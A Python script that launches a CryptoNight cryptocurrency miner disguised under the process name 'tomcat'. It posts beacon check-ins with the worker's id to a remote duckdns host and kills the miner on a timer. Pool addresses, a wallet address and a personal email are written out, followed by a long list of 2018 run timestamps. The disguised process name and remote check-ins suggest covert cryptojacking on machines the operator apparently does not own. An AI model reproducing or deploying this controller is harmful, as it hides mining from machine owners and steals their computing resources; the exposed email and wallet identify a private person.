import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:40:03.699360
#2018-02-17 16:26:03.816911
#2018-02-17 18:12:07.709143
#2018-02-17 20:00:10.098752
#2018-02-17 21:49:02.076645
#2018-02-17 23:34:01.390958
#2018-02-18 01:22:06.341284
#2018-02-18 03:09:07.081972
#2018-02-18 04:58:07.520167
#2018-02-18 06:52:07.259635
#2018-02-18 08:41:01.980128
#2018-02-18 10:27:06.405611
#2018-02-18 12:13:04.448937
#2018-02-18 13:58:07.534685
#2018-02-18 15:48:07.724681
#2018-02-18 17:37:04.324076
#2018-02-18 19:25:05.547137
#2018-02-18 21:10:06.201985
#2018-02-18 22:57:05.103094
#2018-02-19 00:44:04.110549
#2018-02-19 02:31:08.399239
#2018-02-19 04:17:04.878654
#2018-02-19 06:02:04.343160
#2018-02-19 07:50:07.978757
#2018-02-19 09:40:03.933736
#2018-02-19 11:28:01.784821
#2018-02-19 13:14:09.215684
#2018-02-19 15:03:09.140387
#2018-02-19 16:50:07.139893
#2018-02-19 18:38:01.618799
#2018-02-19 20:23:04.561115
#2018-02-19 22:11:01.901676
#2018-02-19 23:57:05.349977
#2018-02-20 01:44:01.457014
#2018-02-20 03:32:07.921012
#2018-02-20 05:19:05.129412
#2018-02-20 07:03:01.492047
#2018-02-20 08:48:01.370268
#2018-02-20 10:31:09.057812
#2018-02-20 12:16:01.405127
#2018-02-20 14:03:07.558643
#2018-02-20 15:46:11.118404
#2018-02-20 17:33:11.367525
#2018-02-20 19:20:07.600976
#2018-02-20 21:08:07.350944
#2018-02-20 22:54:04.568893
#2018-02-21 00:38:07.023949
#2018-02-21 02:24:07.337623
#2018-02-21 04:10:05.411354
#2018-02-21 05:57:07.255916
#2018-02-21 07:46:05.241285
#2018-02-21 09:33:01.588521
#2018-02-21 11:21:05.753684
#2018-02-21 13:11:01.804801
#2018-02-21 14:57:04.480304
#2018-02-21 16:47:04.991816
#2018-02-21 18:33:01.443627
#2018-02-21 20:18:07.416560
#2018-02-21 22:06:04.129748
#2018-02-21 23:53:06.455724
#2018-02-22 01:38:01.820821
#2018-02-22 03:25:05.434473
#2018-02-22 05:11:02.262132
#2018-02-22 06:55:04.215919
#2018-02-22 08:41:07.476005
#2018-02-22 10:28:08.242186
#2018-02-22 12:17:09.090066
#2018-02-22 14:01:06.156208
#2018-02-22 15:48:06.457181
#2018-02-22 17:36:07.888328
#2018-02-22 19:22:07.710433
#2018-02-22 21:14:05.263088
#2018-02-22 22:58:07.091116
#2018-02-23 00:46:09.411224
#2018-02-23 02:33:03.927108
#2018-02-23 04:19:04.982664
#2018-02-23 06:06:03.889055
#2018-02-23 07:51:05.595853
#2018-02-23 10:08:05.301731
#2018-02-23 12:01:10.876658
#2018-02-23 13:49:11.113531
#2018-02-23 15:37:06.561582
#2018-02-23 17:25:09.736390
#2018-02-23 19:12:05.795538
#2018-02-23 20:56:07.438342
#2018-02-23 23:03:02.220918
#2018-02-24 00:52:01.905233
#2018-02-24 02:48:05.314923
#2018-02-24 04:39:01.694749
#2018-02-24 06:23:06.145279
#2018-02-24 08:11:01.752200
#2018-02-24 09:55:06.191267
#2018-02-24 11:50:09.592174
#2018-02-24 13:42:07.038134
#2018-02-24 15:29:01.569125
#2018-02-24 17:22:07.271884
#2018-02-24 19:10:07.071444
#2018-02-24 20:58:05.285577
#2018-02-24 23:26:07.191912
#2018-02-25 03:34:07.238264
#2018-02-25 07:11:04.332030